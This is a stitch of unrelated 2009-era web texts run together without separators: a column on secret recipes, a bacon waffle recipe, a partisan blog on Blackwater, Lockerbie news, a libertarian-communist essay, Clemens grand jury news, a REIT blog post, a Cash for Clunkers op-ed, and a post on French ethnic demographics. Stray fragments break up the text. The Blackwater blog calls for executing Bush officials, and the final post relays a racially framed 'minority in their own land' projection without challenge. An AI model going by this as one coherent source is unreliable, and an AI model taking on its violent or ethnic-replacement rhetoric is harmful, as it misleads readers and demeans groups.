Jay notes that " he has n't spilled the beans yet , but every dog has his price . "
( Actually , as long as we are revealing secrets , the real Duke is actually portrayed by a trained stunt double — is nothing sacred ? )
Coca - cola has one of the most famous secret recipes in the world ; ads whimsically claim that only two men know the ingredient list , and describe the dire consequences that would befall the planet if the secret was ever lost , including a hole appearing in the fabric of the universe .
( Technically , Coca - Cola is no longer produced , and has n't been commercially available for years .
What most people refer to as " Coke " or " Coca - cola " is actually " Coca - cola Classic , " since the now - discontinued " New Coke " was branded simply " Coke . " )
Dr. Pepper claims that its secret blend of 23 flavors is known by only three people alive today .
Kentucky Fried Chicken is home of the famous blend of " eleven secret herbs and spices , " closely guarded by the company .
And so on .
But is there really any such thing as a " secret ingredient " these days ?
After all , over the past decade consumers have gotten more and more disclosure about what 's in the food they eat -- everything from calorie content to food allergy information .
Furthermore , laboratory analysis has kept up with the times .
Perhaps when A.J. Bush baked his first recipe in 1908 , or when the Coca - Cola company was founded in 1892 , there was no way to determine what " secret ingredients " might be in a product .
But these days , any laboratory worth its sodium chloride can tell pretty much what chemicals and ingredients appear in what quantities of a given sample .
It 's food science , not rocket science .
In his book " Big Secrets , " William Poundstone revealed a laboratory analysis of Kentucky Fried Chicken :
" The sample of coating mix was found to contain four and only four ingredients : flour , salt , monosodium glutamate , and black pepper .
There were no eleven herbs and spices — no herbs at all in fact ...
Nothing was found in the sample that could n't be identified . "
So much for the " secret . "
In fact , the chicken 's ingredient statement is available on KFC's Web site .
As for Coke Classic , well , the formula can be found on page 43 of Poundstone 's book , but it includes vanilla extract , citrus oils , and lime juice flavoring .
There 's no cocaine in Coke , and technically there never was , though it uses coca leaves and kola nuts as flavorings and stimulants .
Cocaine is not the same as the coca leaf it is derived from ; for centuries , natives in South American countries regularly chewed on the coca leaf for its anesthetic and mild stimulant properties .
But just as chewing on a coca leaf is not " taking cocaine , " neither is drinking a Coke .
I had planned to reveal the whole Coke Classic formula , but as I prepared this column I got a threatening e-mail from someone who told me that if I did , he would " get medieval " on me .
He referred obliquely to various implements of torture including thumb screws and the Billy Ray Cyrus single " Achy Breaky Heart . "
Revealing some secrets comes at too high a price .
I also got an e-mail from Duke Bush ( who , by the way , is amazingly competent on the keyboard despite his lack of opposing thumbs ) offering to sell me his secret bean recipe .
Benjamin Radford is managing editor of the Skeptical Inquirer science magazine .
His books , films , and other projects can be found on his website .
His Bad Science column appears regularly on LiveScience .
Brown Sugar Bacon Buttermilk Waffles
These Brown Sugar - Bacon Buttermilk
Waffles are light and fluffy , and include bits of brown sugar - glazed bacon in the batter .
Truly the perfect waffle for any serious breakfast lovers !
You HAVE to make these waffles immediately .
Believe it or not , years ago , this was the very first legit homemade waffle ( i.e. not from a Bisquick mix ) that I ever made , and boy was I happy to make the discovery .
Once I made these , I never looked back !
Picture this :
Bacon that is topped with brown sugar and then baked in the oven so that the brown sugar caramelizes into a glaze on top of the bacon .
Then a homemade waffle batter made with buttermilk that is thick , lumpy , and creates the perfect waffle .
Mix the bacon into the batter , scoop onto the waffle maker and , voilà !
Waffles that combine two of my favorite breakfast foods .
My favorite part of grabbing breakfast out at a diner is that , without fail , the bacon and / or sausage will always end up , at least in part , sitting in syrup that has pooled somewhere on the plate .
I absolutely love the taste of breakfast sausage and bacon with maple syrup , and I think that is why I ’ve always been totally smitten with these waffles .
They
The bacon is already in the waffles , and then you douse on the maple syrup – all of those wonderful breakfast flavors in one bite .
You seriously cannot go wrong with this recipe .
Make them for house guests ( or your husband and toddler , AHEM ) and you will be a hero .
I know some of you may ask about my waffle maker ; I have this Breville model and I absolutely love it !
I used to have a round Belgian - style waffle maker , and I think this one is infinitely better .
There are a number of settings to ensure that you really cook up that perfect waffle !
Quick tip – you mayyyyyy want to make a little more bacon than the recipe calls for because it ’s highly likely that you ’re going to sneak a bunch of it while you ’re chopping it up .
Or is that only me ?
I ca n’t keep my hands off the brown sugar - glazed bacon !
This recipe makes a large amount ( about 11 - 12 square waffles or 7 Belgian style ) so it ’s perfect for feeding a crowd or if you want to stock your freezer for ready - made breakfasts ( my preference ! ) .
If you ’re a bacon lover , you are going to go BANANAS for these waffles !
They cook up crisp on the outside and super soft and fluffy on the inside , which is basically waffle perfection .
Head on in to the kitchen and make some of these brown sugar - bacon buttermilk waffles !
Five years ago : Almond - Apple Crisp
Ten years ago : Chocolate Rum Cheesecake
Print 0 from 0 votes
Did you make this recipe ?
Brown Sugar - Bacon Buttermilk Waffles Servings 12 square waffles or 7 Belgian waffles Prep 10 minutes Cook 30 minutes Total 40 minutes Course : Breakfast Cuisine : American Author : Michelle These Brown Sugar - Bacon Buttermilk
Waffles are light and fluffy , and include bits of brown sugar - glazed bacon in the batter .
Breakfast of champions !
Ingredients : For the Bacon 10 slices of bacon
¼ cup light brown sugar
For the Waffles 3 cups all - purpose flour
1 tablespoon baking powder
1 teaspoon baking soda
1 teaspoon salt
¼ cup light brown sugar
⅔ cup canola or grapeseed oil
4 large eggs
2 teaspoons vanilla extract
2½ cups buttermilk Special Equipment Waffler Maker ( I have a Breville and love it ! ) US Customary - Metric Directions : Make the Bacon : Preheat oven to 375 degrees F. Line a baking sheet with parchment paper , a silicone baking mat , or spray a baking sheet with non stick cooking spray and line with foil .
Arrange bacon in a single layer on the baking sheet .
Sprinkle generously with the brown sugar .
Place in the upper third of the oven and bake until sugar is caramelized and bacon is brown and crispy , about 10 to 15 minutes .
Remove from oven .
Immediately remove bacon slices using a pair of tongs .
Place them on a cutting board ( not paper towels , they ’ll stick ! ) to cool .
Once cool , chop the bacon into bite size bits and set aside .
Make the Waffles : Preheat your waffle iron .
In a large bowl , whisk together the flour , baking powder , baking soda , salt and brown sugar .
In a medium bowl , whisk together the eggs , oil , buttermilk and vanilla extract .
Add the wet ingredients to the dry ingredients and fold with a rubber spatula .
Once almost fully incorporated , add the bacon and stir .
Mix only until most of the dry ingredients are moistened in the batter ; like pancakes , it 's good to have a lumpy batter .
Cook the waffles according to your waffle machine instructions .
Serve with butter and maple syrup .
Leftover waffles can be stored in an airtight container in the refrigerator for up to 4 days , or wrapped in plastic wrap and placed in a ziploc freezer bag and stored in the freezer for up to 2 months .
My favorite my to reheat them ( whether fresh or frozen ) is in a toaster oven .
Recipe Notes : Nutritional values are based on one serving Nutrition : Calories : 389kcal Fat : 23g Saturated fat : 4g Cholesterol : 72mg Sodium : 483mg Potassium : 270mg Carbohydrates : 36g Sugar : 11g Protein : 9g Vitamin A : 170 % Calcium : 122 % Iron : 1.9 % Did you make this recipe ?
Leave a review below , then snap a picture and tag @thebrowneyedbaker on Instagram so I can see it !
This recipe was originally published on August 3 , 2009 .
surprised ?'> surprised ?'> surprised ?'>
Oh , this is just our Erik being sworn in to testify before some congressional committee or other back in 2007 about some alleged Blackwater depredation or other .
Who can keep track ?
Oh Lord , a crusading Christian freedom fighter 's work is never done -- at least as long as there are Muslims left to exterminate .
The Nation
Blackwater Founder Implicated in Murder
by JEREMY SCAHILL
August 4 , 2009
A former Blackwater employee and an ex-US Marine who has worked as a security operative for the company have made a series of explosive allegations in sworn statements filed on August 3 in federal court in Virginia .
The two men claim that the company 's owner , Erik Prince , may have murdered or facilitated the murder of individuals who were cooperating with federal authorities investigating the company .
The former employee also alleges that Prince " views himself as a Christian crusader tasked with eliminating Muslims and the Islamic faith from the globe , " and that Prince 's companies " encouraged and rewarded the destruction of Iraqi life . "
In their testimony , both men also allege that Blackwater was smuggling weapons into Iraq .
One of the men alleges that Prince turned a profit by transporting " illegal " or " unlawful " weapons into the country on Prince 's private planes .
They also charge that Prince and other Blackwater executives destroyed incriminating videos , emails and other documents and have intentionally deceived the US State Department and other federal agencies .
The identities of the two individuals were sealed out of concerns for their safety .
. . .
tea parties
#
We really need to figure out some sort of strategy for dealing with the flotsam and jetsam that continues to surface from the eight years of unbridled lunacy and criminality that were the Bush regime .
Now it 's one of the regime 's most prized sociopaths , the founder of Blackwater , the American " security " firm ( this is what we call out terrorist organizations ) into which the regimistas poured still - uncounted jillions of dollars to befoul the good name of our country all over the world with its high - caliber acts of marauding and mayhem .
From what we knew about this Erik Prince bozo , a thug with delusions of Christian grandeur , it always seemed pretty clear that he belonged under lock and key .
As with so many of the regime 's stooges and cronies , the only real question was whether he should have been in a prison or a mental institution .
With Blackwater under investigation ( surprise ! ) , it 's now being alleged by two people who worked for Prince Nutso that he " may have murdered or facilitated the murder of individuals who were cooperating with federal authorities . "
And this is supposed to be a surprise ?
When you 've got a government run by sociopaths , hiring a mix of sociopaths and psychopaths -- and you know how badly they get on together -- and telling them there are no rules for people like us , what do you expect ?
Okay , let 's look at just a little of this .
Now of course the report goes on and on and on , you bet , and we should care about the sordid details , like the allegations that Blackwater was smuggling guns into Iraq in dog - food bags .
But really , is there anything useful to be learned for those of us who spent those eight years screaming that everyone who participated in the activities of the Bush regime should be subject to the death penalty -- preferably on an execute - now , ask - questions - later basis ?
And the fact is , the rest of the country did n't give a damn about the all - consuming campaign of degradataion , depredation , and extermination unleashed by the Bush regime against all its " enemies " while it was going on , and by the time the shock and shame became too overwhelming , they simply tuned out .
Bush ?
George W. Bush ?
Sorry , name does n't ring a bell .
Oh wait , did n't there used to be a lesbian by that name ?
It appears that the sins of the Bush Regime -- including all those committed by , in , around , and for the regime -- have a " sell by " pull date just like dairy products in the supermarket .
Besides , if the regimistas were to be held to account for every last murder , why , there 'd be no end of it !
I say , just add this to Attorney General Eric Holder 's Super - Fantastic List of Old Stuff to Maybe Someday Investigate , or Not .
( The list could someday actually have value to the adminstration , as it becomes increasingly desperate to buttress its one incontestably admirable quality : that it ' sthe Bush regime . )
Labels : Blackwater , Bush Regime law - breaking , Erik Prince
Foreign Minister David Miliband told the BBC that it was “ a slur both on myself and the government ” to suggest that oil was a factor .
Image
In Lockerbie , Scotland , a memorial commemorated the victims of the 1988 bombing of a Pan Am jet over the village , which killed 270 people .
Credit ... Jeff J. Mitchell / Getty Images
The release of Mr. Megrahi , 57 , and the officially orchestrated welcome he received from hundreds of flag - and placard - waving Libyans when he arrived at Tripoli airport with Colonel Qaddafi ’s son Seif al - Islam el - Qaddafi has incited controversy on both sides of the Atlantic , with the government of Prime Minister Gordon Brown facing bitter condemnation from opposition parties .
On Friday , the White House spokesman , Robert Gibbs , described the scenes in Tripoli as “ outrageous ” and “ disgusting , ” adding fresh momentum to President Obama ’s condemnation of the Libyans ’ behavior on Thursday and the enraged comments of many of the American families whose relatives were among the 270 people killed when Pan Am Flight 103 exploded over Lockerbie , Scotland , in 1988 .
The American outrage stirred an intense and bitter debate in Britain over who really bore responsibility for freeing Mr. Megrahi , and why .
He had served only eight years of a life sentence handed down by a specially convened Scottish court in the Netherlands , which specified that he serve a minimum of 27 years .
David Cameron , the Conservative leader , condemned the release as “ wrong ” and the product of “ completely nonsensical thinking . ”
Image In December 1988 , police officers and investigators looked at wreckage from Pan Am Flight 103 .
Credit ...
Associated Press
The British government and the Scottish government , which made the formal decision to free the bomber under justice powers transferred to Edinburgh under the Blair government , each appeared to be trying to shunt responsibility to the other .
Both governments were met with a wave of denunciations in Britain ’s national newspapers , which reported the release under banner headlines like “ An affront to justice ” and “ A shabby deal , ” many of them alleging that the hunger for oil deals was the original catalyst for letting Mr. Megrahi go .
Meanwhile , Mr. Megrahi continued to insist on his innocence , telling The Times of London that he would “ put out evidence ” exonerating himself and that the people of Britain and Scotland would “ be the jury . ”
Asked who was responsible for the bombing , he said , “ It ’s a very good question , but I ’m not the right person to ask . ”
by Mark Ellingsen
A lot has been written recently about the corruption of politicians , the crisis of democracy and the legitimacy of Parliament .
This is particularly apt as this year marks 200 years since the death of Tom Paine , the radical liberal who was an inspiration to movements fighting for the vote .
On the Left the analysis of this crisis has revolved around the interconnected reasons of the failure of the Labour Party to deliver job security and prosperity to its ‘ natural ’ constituency of working class voters on the one hand , and on the other , the class nature of the capitalist state which ensures that the policies enacted by governments will ensure the profits of the capitalist class even to the detriment of the majority of voters .
Quite rightly these arguments take centre place in any discussion of the problems now confronting both voters and the mainstream parties .
However , there is a complementary argument that even on its own terms the ideas associated with liberal democracy are never going to provide a sufficient long - term basis on which the majority of people were going to be motivated to be engaged with what currently passes as the political process .
But in order to understand the perceived crisis of liberal democracy we need first to understand the crisis of liberalism .
Freedom
Liberalism is associated with the freedom of speech and the toleration of different views ; the protection of the individual ’s privacy , particularly from the intrusions of the state ; and the protection of private property .
A political philosophy which originated in the 17th and 18th centuries with the rise of a capitalist class and its challenge to the aristocracy , liberalism has always championed the freedom of the individual .
It is this respect for the individual that gives it a popularity with those who are faced with state repression .
It was often used as a stick by the Western media to beat the regimes of the former Soviet bloc for their suppression of free speech and individual expression , whether in terms of artistic freedom or consumer choice .
While much of what passes in the West as free speech and individual expression is constrained by the control of the newspapers and television networks by capitalist corporations , nonetheless the importance of liberalism for a humanist communism is its respect for the individual and the choices he or she makes .
However , the freedoms that liberals advocate are always under pressure from the consequences of the dynamism which characterises capitalist development .
The disruption to people ’s lives from the dislocating effects of economic upheaval and war often leads to the partial breakdown in social order or a political challenge to the state .
Even before the current economic recession , the West was faced with continuing structural unemployment , the exclusion of sections of the population from the gains of the economic bubble and a reaction to racism and imperial adventures , which all added up to the fear amongst mainstream commentators and politicians of the partial breakdown of social order .
The abandonment of working class estates where social order is under threat from crime and anti-social behaviour and the emphasis on the protection of private property and crime - free zones around the shopping malls and nightspots so that others can continue to consume unimpeded has led to a massive increase in surveillance cameras .
The more the political elite abdicate responsibility for the impact of economic upheaval and looming environmental devastation the more they become obsessed with crime and social order to the detriment of our civil liberties , to the extent that our electronic communications are collected and our biometric data stored in police databases .
This is a totalitarian state in the making and the dwindling numbers of liberals are finding it difficult to hold the line .
Citizenship and Democracy
Contemporary liberal theory places a great emphasis on citizenship .
However , one of the earliest understandings of citizenship is to be found in ancient Greece .
For those who were citizens of Athens , citizenship was synonymous with participation in democratic decision making which affected the people of the city .
Although it excluded women and slaves it is interesting to compare this with the ideas of citizenship which are prevalent today .
Unlike modern liberal democracies in which people are given the right to vote for representatives every few years , Athenian democracy expected its citizens to be involved in the making of decisions and direct rather than representational democracy was seen as the ideal .
Where representative democracy was unavoidable due to the scale or organisational complexity representatives were most often chosen by lot rather than by election because it was understood that all citizens should be equally competent at making decisions .
The election of officers with technical expertise such as military or financial was an exception to the rule of democratic participation .
The contrast with the current idea that there ought to be a group of professional politicians who can take decisions on our behalf , because they are somehow more competent than the rest of the population could n’t be sharper .
Of course , today we often equate citizenship in liberal capitalist societies with a modicum of democracy , meaning the right to vote once every few years , rather than democratic participation .
Yet even that has not been a cornerstone of liberalism for very long .
In the 18th century , those who adhered to the classical liberal ideas which emphasised the freedoms we now associate with democratic countries did this on the basis of a very restricted franchise .
It was only men of substantial property who could participate in parliamentary politics .
Not until the Reform Act of 1832 was this extended somewhat , but even that still left most of the adult British population without a vote .
In this sense , liberalism was not inconsistent with a restricted citizenship , although the repression of Chartist newspapers calling for the vote for working class men did n’t sit comfortably with the liberal ideal of free speech .
It was only in 1928 that property restrictions were lifted for both men and women .
That it took so long in coming only highlight liberalism ’s fetish of private property , a key element of its philosophy .
For early liberalism , only the propertied man was capable of making decisions which affect the political and more importantly the economic life of the country .
Only the propertied can safeguard property .
That liberals no longer adhere to such views is in good measure a response to the rise of labour and socialist movements from the mid-19th century .
Indeed , under pressure from socialists , some liberals went further and argued that the working class could not fully participate in the political process without the eradication of poverty , ill health and the lack of education .
This social liberalism , as it came to be known , supported the introduction of a welfare state and became the cornerstone of social democratic and labour politics .
Citizenship then became more than just the formal political equality of all adult men and women but also the recognition that being active and engaged citizen required a minimum standard of living .
However , this social liberalism is now under threat from the crisis of profitability within the capitalist economy .
The welfare state is being undermined in order to cut the social wage which makes up for the lack of the means for most people to afford private education , health care and social insurance against unemployment .
That social liberalism has never been accepted by the ruling class in the United States underlines the tenuous hold that substantive citizenship has for liberalism .
Listening to the rhetoric of the Labour Party , one could be forgiven for believing that here was one party which was trying to stop the undermining of citizenship .
The irony is that not only is this party intent on undermining a welfare state based on need and replacing it with one based on private profit but its notion of citizenship is one in which the population , especially immigrants , are obliged to show allegiance to the state and the values of the ruling class , rather than being part of a community of citizens underpinned by a decent standard of living for all .
The discussion around citizenship has been about the balance between rights and obligations and with the increase in social disorder it is unsurprising that the political elite have stressed the latter .
At no point had there been any discussion about democracy , until the expenses scandal so exposed the cynicism and careerism of the majority of politicians that afraid of losing personal position , they mouthed platitudes about connecting people with politics .
But democracy is not about connecting people with politicians , it is about people being able to influence decisions which affect their lives either directly or through delegates who represent the decision of their constituents .
We do n’t need professional politicians .
As the percentage of people voting falls at each election it is often argued that democracy is under threat from apathy , that there is a crisis of liberal democracy .
There is undoubtedly a crisis for liberalism and for the Left as rights and freedoms are undermined by emergency legislation introduced to curtail dissent and social disorder .
But to argue that liberal democracy is under threat is an exaggeration .
Liberal democracy thrives on apathy .
It depends on a passive electorate which is content only to vote every few years for parties which are similar in outlook .
This is not to say that the political elite are completely unconcerned about voter apathy but the concern is more about legitimising the political decisions that are made and the role of political elite rather than a concern about engaging the electorate in the process of government .
The problem for the political elite is that the potential voter is not stupid .
People are apathetic because elections make little difference as the parties provide little choice .
For all its rhetoric , rather than providing the epitome of citizenship , the ideology of liberalism has devalued it .
Unlike in ancient Athens , in modern capitalist societies , being a citizen does not give people the facility to participate in a democratic process of decision making .
Rather it gives people a set of individual rights profoundly constrained by the power of large corporations and the state .
The modern notion of citizenship is ironically much narrower than the idea of citizenship of ancient Greece despite the latter ’s restriction to males who were not slaves .
Civil Society and the State
However , there is another way in which citizenship is constrained within capitalism and in a way which is much more profound than the constraints in the political sphere .
This is the lack of democracy and freedom within the workplace .
Our relationship to our employer is as workers not as citizens .
Citizenship is limited in scope ; it does not include our rights to participate in decisions within the workplace , across the company or institution , with regard to how it relates to rest of the economy , or the locality in which the workplace is situated .
The separation of the economy from the polity in capitalism is precisely why there is some form of political democracy , albeit limited .
By confining democracy to the political sphere , liberalism leaves untouched the arbitrary power wielded by the employer in the workplace .
What little democratic accountability that exists in our society does not extend to the workplace , where the majority of us spend most of our adult lives .
Since the eighteenth century , the state has been seen as separate from ‘ civil society ’ , namely the economy and other social institutions .
Civil society was seen as a bulwark against the excesses of state power and this idea was given a new lease of life in response to the repression and arbitrariness of state power in the state socialist societies of Eastern Europe and the USSR .
This concern to protect the individual citizen from state power is admirable and it is something that libertarian communism shares with the liberal .
However , liberalism retains a blind spot with respect to the power wielded by those who run the economic institutions and this is because liberalism is committed to the privatisation of the economy .
At the same time as seeing private property as a bulwark against state power , it fails to see the despotism within the private corporation .
This is a consequence of liberalism ’s fetish of private property .
The freedom and democracy won in the political sphere have been tolerated because it leaves untouched the root of capitalist power which has its foundations in the economy .
The democratisation of the economy is an anathema to liberalism because it would challenge that very despotism which liberals defend , the largely arbitrary power of managerial authority within the workplace and the economy as a whole .
Not only does liberalism leave that power untouched , but what little democracy it allows in the political sphere comes with the proviso that capitalist property remains sacrosanct and that the state remains subordinate to the economy .
For all its rhetoric , liberalism merely provides us with a pale imitation of democracy .
If it was democratic , as it professes , then it would not hesitate to champion substantive democracy in the economy and the workplace .
This it leaves to the communists and anarchists while disparaging both .
Introducing democracy to the workplace and the economy is the key to empowering people in their daily lives .
People will not be engaged with a democratic process if it leaves large parts of their lives subject to the arbitrary power of an employer and an economy which is subservient to profit maximisation rather than the needs of working people .
It is for this reason that workers ’ self - management must be at the centre piece of any politics which aims to empower people to make their own choices in life .
However , the political sphere cannot remain untouched .
If the economy is run along democratic lines then what is the need for a separate state ?
In a democratic communist society , it is not the state that manages the economy , but the democratic economy managing the economic functions of the state , to the extent that the two are no longer separate .
Both are subject to the principles of democratic self - management .
Libertarian communism takes the principles of freedom and democracy which liberalism professes to champion and extends these into both the political and economic sphere abolishing the division between the worker and the citizen .
A former gym owner in the Houston area said Thursday he has been issued a subpoena by the Washington grand jury investigating whether Roger Clemens lied to Congress about using performance - enhancing drugs .
Kelly Blair told ESPN.com 's Mike Fish that he was served with the subpoena on Tuesday and initially was told to appear July 23 , but Blair said he will testify before a grand jury in Washington , D.C. on Aug .
4 .
" My name is all over TV and radio , " Blair told Fish .
" I think they 're trying to bring me in as a character witness to [ make me ] look bad . "
The New York Daily News first reported the story on its Web site .
The newspaper also reported Blair told friends that several others associated with the gym , which was linked to the distribution of performance - enhancing drugs , have received subpoenas .
Blair was a partner in 1 - on - 1 Elite Personal Fitness , a gym in Pasadena , Texas , that closed last year .
He is a cousin by marriage to New York Yankees pitcher Andy Pettitte , a former teammate of Clemens ' .
Pettitte 's father worked out at Elite Personal Fitness , where he reportedly obtained HGH .
Clemens ' attorney , Rusty Hardin , did not return a call for comment by the Daily News .
Blair said he gave a small sample of HGH to a third party who he suspects might have then given it to Pettitte 's father , Tom .
" These people [ the grand jury ] have no idea who I really am .
Did I supply Roger Clemens ?
Of course not .
Did I supply Andy Pettitte 's dad ?
I probably could have , " Blair told Fish .
" In court , it 's going to be a yes or no question .
But I did n't deal with Andy Pettitte 's dad directly . "
Added Blair : " I know this is not going to make me look good .
Have I ever sold steroids ?
Yeah , when I was 19 .
That was a long time ago .
I do n't deserve to be called a drug dealer . "
When asked what the FBI asked him during an earlier interview , Blair said : " Just simple questions .
' Did you supply Andy Pettitte 's dad ? '
No , not directly .
...
If they 're calling me in , it is a joke .
They 're trying to say I supplied Roger Clemens through Andy Pettitte 's dad .
That is ridiculous . "
Now , Blair does in - home personal training and has clients in mixed martial arts .
He 's also recently trained boxers , including Samuel Peter , who lost a heavyweight championship fight to Vitali Klitschko in October 2008 .
Blair said he never thought to contact Clemens and talk to him after the FBI met with him .
He admitted that he is a fan of the seven - time Cy Young Award winner and believes Clemens ' claim that he did not use steroids .
" I know that in the end , the truth is going to come out , " Blair said .
" And I 'm just really excited about getting that out there . "
Trainer Brian McNamee has told Congress and federal investigators he injected Clemens with performance - enhancing drugs from 1998 to 2001 or 2002 .
Clemens has denied those claims .
One of McNamee 's attorneys , Richard Emery , said he believes the subpoenas issued to Blair and his associates indicate the Justice Department has gone beyond McNamee 's claims as it investigates Clemens .
Shaun Kelley , owner of a Houston training center who denied meeting Clemens or providing the pitcher with illegal substances , told the Daily News he had not received a subpoena .
Kelley said he had taken a polygraph test for FBI investigators in April .
Mike Fish is an investigative reporter for ESPN.com .
Information from The Associated Press was used in this report .
Rental Property vs REIT
Off and on , I ’ve been thinking about buying a rental property but for some strange reason , the idea of Real Estate Investment Trusts ( REIT ) never crossed my radar .
Over the weekend , a conversation with a former coworker sparked my interest in this sector again , and this time , I decided to compare a rental property with REIT .
After a bit of research , let me share with you what I learned .
First , The Real Estate Conversation
Over the past year , one of my co-worker bought an income property for $ 140,000 .
According to him , he is getting $ 1,500 + in rent a month and after calculating all the association , property taxes and such , he is getting a 9 % return on investment .
With a strong cash flow like that , he can afford to wait until prices of housing finally go back to a normal upward trajectory , which is rather impressive .
( now you know why I was interested … )
But REITs seem to be a good alternative too .
With a bit of digging , I found was that investing in a REIT is similar to investing in an individual stock in that the performance ( and risks ) are very dependent on the company that owns the actual properties .
Therefore , investing in a particular REIT meant that I had to keep up with research and make sure I ’m not investing in a dud .
That ’s too much work , so I turned to ETFs .
Luckily , Vanguard has a pretty attractive ETF in this area – Vanguard REIT ETF ( VNQ ) .
At first glance , VNQ’s 4.8 % yield is not as attractive as a 9 % return , but 9 % comes with more hassle and risks .
They include :
Possible Tenant Troubles –
They may call you for something that needs to be fixed , which costs you time and money .
Tenant Payment Issues –
If the tenant decides to live there rent free , it takes months to properly evict them .
Tenant Changeover – Every time the original tenant moves out , you have to pay for cleaning , possible remodeling as well as the down time of having no tenants for a while .
General Maintenance of the Properties – Houses need fixing as they age , and everything is a cost .
Soft Costs – Cell phone costs for talking to the tenants , gas to go check out and manage the properties are all costs that add up over time .
On the other hand , REITs offer :
Liquidity – The ETF can be bought or sold at any time .
Compound Interests – Dividends are distributed quarterly and if you reinvest it back into the ETF , the returns are higher than the stated 4.8 %
Historically , the yield is higher than 4.8 % , but with a sagging economy , vacancies are high .
Over the long term , this yield should increase faster than the rent that my coworker is getting .
Small Barrier of Entry –
The reason why my friend is able to buy these condos at such a low price is because he is paying cash .
How many of us really have $ 140,000 lying around ?
With VNQ , you can start with $ 50 .
Other Factors to Consider
Taxation –
In general , dividends from REITs are taxable as ordinary income .
Since this is the same as the income generated from an income property , it becomes a wash .
However , REITs sell buildings from time to time , forcing investors to take capital gains , which can erode some gains .
With REITs , you can put it in retirement accounts to shelter the income from taxes while it ’s not possible ( at least from what I ’ve read so far ) to do so with a real property .
Appreciation – Rental properties obviously can gain in value , and so will REITs .
I consider this a wash because I , or anyone else for that matter , cannot accurately predict which investment is going to appreciate more in the future .
Since I ’m striving towards passive income , a REIT ETF seems like the way to go , especially if I ’m thinking long term and planning to make investments in my retirement accounts .
What do you think ?
Do you own either of these and have some suggestions for a novice like me ?
Anything else you want to add about these ?
Editor 's note : Jack D. Hidary co-founded a technology company , Earth Web / Dice , and a financial research company , Vista Research .
He works currently in the fields of clean energy technology and policy and is chairman of SmartTransportation.org which successfully pushed for the use of hybrid cars as taxis in New York City .
Jack Hidary says the Cash for Clunkers program promotes fuel economy and safety while boosting the economy .
NEW YORK ( CNN ) --
Our country is facing a daunting economic challenge this year and we must take steps to pull ourselves out of this ditch .
One such program that has hit the ground running is Cash for Clunkers .
It 's helping consumers move beyond these hard times and has reignited a whole industry .
Cash for Clunkers is now working in more than 10 countries around the world .
In Germany , consumers have junked more than 1.2 million guzzlers in the last five months and significantly boosted the economy there .
So we know that Clunkers programs get the job done .
How many other government programs can you say that about ?
The Senate has joined the House in passing an additional $ 2 billion for Cash for Clunkers , allowing the program to move forward .
This will bring additional buyers to the showroom .
One key feature of the Clunkers program is that it is not just $ 3 billion of new money into the economy .
It is injecting $ 21 billion -- since consumers must bring the rest of the money to pay for the new car .
That is a lot of stimulus for the dollar .
Cash for Clunkers is saving jobs up and down the auto supply chain : from dealers to assembly workers and parts markers .
Dealerships alone lost 50,000 jobs in the last 18 months and would continue to shed jobs without this program .
If you look at the new cars consumers are buying with the program , 45 percent are from Detroit 's Big Three automakers .
That is a lot of new sales for Ford , GM and Chrysler .
Cash for Clunkers also helps autoworkers across the country .
Let 's remember that lots of the Toyotas and Hondas sold in the program are made by American workers right here in this country .
They are in states such as Kentucky , Tennessee and Alabama .
This program helps all American autoworkers , not just those up North .
Some people ask why we should help the auto industry and not other industries in this same way .
Cash for Clunkers actually helps all of us -- even those of us who do not participate in the program or work in the auto industry .
First , the auto industry has so many connected jobs in real estate , finance , manufacturing and other industries , that is hard to separate it out .
Second , one of the biggest drags on our economy is our trade imbalance .
We import about $ 700 billion more than we export .
That hurts our capital flows , credit and other key indicators .
Guess what amounts to 50 percent of that trade imbalance ?
Oil .
We use 21 million barrels of oil every day in the United States and import 62 percent of that -- mainly from countries that really do n't like us .
We use that oil mainly for transportation -- cars , SUVs , and other vehicles .
Unless we scrap guzzlers at a faster rate , we will never reduce our oil consumption .
Cash for Clunkers is a step in the right direction .
It educates the consumer on how much they are paying for having a low - MPG car and encourages them to get into a more efficient vehicle .
A family can save $ 750 - $ 1,000 a year by jumping just 10 mpg in efficiency .
Those savings will increase as gas prices go back up .
Gas has already shot up from $ 1.50 a gallon to $ 2.60 .
Do you want to be stuck with a 10 mile - per - gallon guzzler when gas jumps back to $ 4 a gallon ?
Third , Cash for Clunkers saves lives .
When you bring in a clunker that has no airbags , anti-lock brakes or other modern safety features and get a new car that does , you are protecting your family .
Forty thousand people die every year on American highways and many more get serious injuries .
You can reduce your chances of becoming a statistic by getting the most safety for your dollar -- and with the Clunkers program you can now do that more affordably .
As a co-architect of the federal Cash for Clunkers program with the Center for American Progress and the American Council for an Energy - Efficient Economy and adviser to various congressional offices on the issue , it is gratifying to see how quickly it has been adopted by the American people .
It achieves multiple goals -- it stimulates auto sales , increases the efficiency of the U.S. fleet and makes us safer .
Let 's support this program by encouraging our friends and neighbors to finally retire that guzzler and help the country with the purchase of a cleaner , lower maintenance car for the future .
The opinions expressed in this commentary are solely those of Jack D. Hidary .
All About Automotive Safety • Oil Prices • Cars and Car Design
It 's good to be an economist and to know how to count .
While we sit around wondering how many non-European immigrants there are in France , economist Gérard Pince has figured it out in an easy - as - one - two - three procedure that he shares with us in a post dated July 30 .
His opening paragraphs describes how invalid the official figures are ; he then moves on to his own method :
In fact , we have a precise starting point : that of the population in 1946 ( 40,246,742 ) , bearing in mind that foreigners and immigrants at that time were 88 % ethnic Europeans .
We then add to this initial population the natural growth ( minus immigration ) until 1974 , date of the family reunification law , and we get 49,105,699 in 1975 .
We then apply to this figure the rate of natural growth in three French departments where immigration remained until that time negligible : la Manche , Deux Sèvres and Vendée .
We arrive at the figure for 2008 of 53 million ethnic Europeans .
Since INSEE ( National Institute for Statistics and Economic Studies ) estimates our total population in 2008 to be 62 million , it follows that black , Arab and Asian ethnicities represent today 9 million persons .
9 million plus 500,000 illegals , he adds in a footnote .
In his next ( more complicated ) post , Gérard Pince continues where he left off :
As of January 1 , 2008 , the population of metropolitan France was 62 million : 53 million ethnic Europeans and 9.5 million Third World immigrants .
From this real and objective data long term projections indicate that ethnic Frenchmen will be a minority in their own land in 2060 . [...]
We estimate that the European population will remain at its current level of 53 million in the year 2060 .
The natural growth rates of our three model departments have been divided by two ( for la Manche and Vendée ) and by three ( for Deux Sèvres ) between 1975 / 82 and 1999/2006 .
Moreover , the countries of Eastern Europe without non-European populations , have already recorded negative rates ( - 0.3 % in Hungary , - 0.1 % in the Czech Republic ) .
Seen in this context , the zero rate we have predicted corresponds to a rather optimistic hypothesis .
On the other hand , the non-European population already present on our territory will go from 9.5 to 24 million in 2060 .
